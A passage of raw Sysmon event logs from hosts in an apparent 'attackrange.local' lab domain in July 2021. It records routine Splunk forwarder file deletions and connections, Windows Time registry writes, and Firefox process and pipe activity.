Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8144061D94BE60169DD3A6AABA4C8C89,SHA256=B902A100C46DDCA510FE94EB5FF14DF5FB36E5C371A246F037EC7A3F9B2895D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7DC534C9AA5222E16143A8DB6E712EF5,SHA256=E77F7BF9A4A9657441FAC2D5AADF43AC793238432AF7D551AD803B47B1446374,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:56.129{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A493471BC8517D7DEAF24AB75A06E5,SHA256=57F535522CE76D6EEB911DAB78B588F5E1C3522990543A749AAAEA48582E3823,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045927Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:56.732{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045929Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:57.863{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB0CA2D9F13AC31469D8D5A28977E73,SHA256=1FD45FC8E8D3505248D43CC965DE463C93769CA3AA94096E622F697070E0DC5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:57.129{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6413FCFF21ECB98A5289B706EF350102,SHA256=D88B2FD953A097F1D6A4806BCFBD0701AF5F5768DB0CB321B12DD17AA39399EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:58.881{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08BBDD9F746264D4675636920093A631,SHA256=66D542866C6CA1DF30B0E3EAC05C341266383465D84E799D7CDC55CD4D0011F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806037Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:58.144{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9A4FE553B2B1EB7B1D999A9968B8690,SHA256=3D78D08ED47886B19ED44C15133B712C71EF4763EC4DDF3214DE90CEF5C128F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045930Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:50.273{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50901-false10.0.1.12-8089- 23542300x80000000000000001045942Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:59.915{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=687C067EAEBBBF3B2541B26B6526E526,SHA256=1DD62F5EB0E95406842C3DC61E260073FE653147C274ED97A309FB6E6C39E358,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001045941Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001045940Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f61ba0b) 13241300x80000000000000001045939Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x4af0f7fc) 13241300x80000000000000001045938Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xacb55ffc) 13241300x80000000000000001045937Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x0e79c7fc) 13241300x80000000000000001045936Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000001045935Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x0f61ba0b) 13241300x80000000000000001045934Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d776e9-0x4af0f7fc) 13241300x80000000000000001045933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d776f1-0xacb55ffc) 13241300x80000000000000001045932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:43:59.599{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d776fa-0x0e79c7fc) 354300x8000000000000000806039Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:57.309{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57152-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806038Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:43:59.160{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F5778DC59C28DF4A5DAA518664F4276,SHA256=69466B56E62886DED1D74A74BAFF9DDFC3A8E94FB468C8A3A3803771E61A4CB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:00.929{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BFEC24048A384D9D581B0ABABE92686,SHA256=54109DC3DBA182A92C58FAC342D074C63FC0912CDDEFCE9538BF8E3FACE2FDBC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045943Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:52.656{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50902-false10.0.1.12-8000- 23542300x8000000000000000806040Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:00.160{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01630760B8FD09FCB2EA363156742B5D,SHA256=F508B3F7AC1F4431C5805F68EB58DD41CC933B2B602A83C07AEF6FBEAD3721C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:01.977{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D630D7395CF2EEDB2B48151BF3D8D0C6,SHA256=F0F5051AB96EDD5B78056FA1F4290590E86473529169BA417A10AE9FAC3AFFFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806041Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:01.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4862FC3E2D8B602D0750643E02F03E,SHA256=57303DBEFDDF5335A9F6A6930EF29421E33DF498AAE48631F43E8ACC35783CA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806042Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:02.207{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAB41BB2AA9009EAB649486888990A3C,SHA256=B1DB4234187DEF0FE739C3F3C68F442B6D7B891FDBBFE4895EE1FED4F4B4EE5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806043Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:03.269{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F266C5658591992600687A0E91B85FD,SHA256=24B13094043C19FE989DEAB932A8D4811C3F4D740AC3F9B8D34D5920BC2E5C82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:44:03.012{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=22EABD3D6014278955146B66F8F02576,SHA256=CEA2E09A130DCB0772534F8B17CC1EC0F7115A83A91D64B097A6005BD4FE9AAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806045Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:03.231{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57153-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806044Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:04.285{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF746B69849F34924F48851C4EC1E9D8,SHA256=29D431FADF6ED16FC04B9E0E9B0CBB049005DDD535C4C719F27AADBC77F0BF1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:04.027{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B74FD9E4BD0307C32EE494A8333DC9A,SHA256=54F6D09BFB22C43C60AEDD444FCEB0EB2498C07A5256C00C648CB3992C312260,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806046Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:44:05.285{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E724A5CECB4B542473D94354093EDD58,SHA256=819ED1766D5A36A1CCF3457CF4E2C06D704E3127138F9DB558E12A0565C6A3DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:05.041{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E0F71DA909199D082B0ABDA49A9D463,SHA256=BB407D374779F6F331DC4141D0C9E8DA36CEE02902CDE17C051436AA9D0A09C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806047Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:06.301{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98992866668011EF9AA1AD8E50A51C5,SHA256=5F1F7C2D03F0543B1921B7723B2BC360A7D261395639FB11509B3A5A062B276D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:43:58.650{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50903-false10.0.1.12-8000- 23542300x80000000000000001045965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program 
Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2A5EBF036AAE0DBE95A4B46AD188AE2,SHA256=ED0961729199833A680162C96B35B15EDD943839A6C5F0AC38A6A052C1F0DF10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED34875B163DCA845C0DD614380CE8FB,SHA256=6E1C330AEC001258E27481F4FD43D03B22787ADC68DCD9FDA350C9850241A26E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D4EB652B47860816D4DA4F31E4FD8CA3,SHA256=79355997BE8640DDDD5BF231339966F63D70560768D9EE047ED1D2D0E445DF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=10EC0F2E6672BB13172D48C31D73E3C4,SHA256=CC0E1994798B8EDF77E4DA9DF366AFCD953A55F6B7E3FEB0ACBC24600877D229,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.156{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=45BCD4EB5FDBE47D5603997EB949DD7E,SHA256=B48874B723AA3D45B9268044824149118D59C4B7C749055D89B0A1A9686C4BB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF869595511F3594F92E8D69D234CADC,SHA256=6DB9D06BB1ED93C17720E1E4AFF033C58A0F66A435D197F3BBB9F347B4E41283,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8A81D9F4E3336E823202017DDC3B257D,SHA256=6F62B9D1DF9064BC20D4EFC3FBDC30123C581DB127D3F131EAF5856776ACAE7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program 
Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E649761957C22EF5F610715D57F77690,SHA256=03A0ABBA5EB350D63A02D12D08FBD42D57FC836FF5647D69BA78B25E716B84C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.141{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D9731033594F51D632472CE46A678CDE,SHA256=1B98826CDCADCC2ED9B2434DD27C4EC400CF485F6266C8F9316974B07E07AFB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.125{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7441F74B29EBA2D472A712DD5F9EED2D,SHA256=ACBE57FF2A26BA11C9B8AFAAA0E219FD879926B561D84EBB11A77340F07CCCDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.125{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12635014EAC728EF58BF73D3C8457F72,SHA256=5C68F5D0A5969D825DD51D5B485C3A13596B9ADA45531FD5138DFCC24C3C1B03,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001045953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.078{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001045952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.078{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla 
Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001045951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:44:06.075{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1211.104550499C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001045950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:44:06.075{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1211.104550499C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001045949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:44:06.056{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCC97FDB35A31FEA5C8B45394CE38DF9,SHA256=4DB954B1A9373A31175C03732F00966CF0B1201D8234349BABA617844DDFAE57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806048Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:44:07.332{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 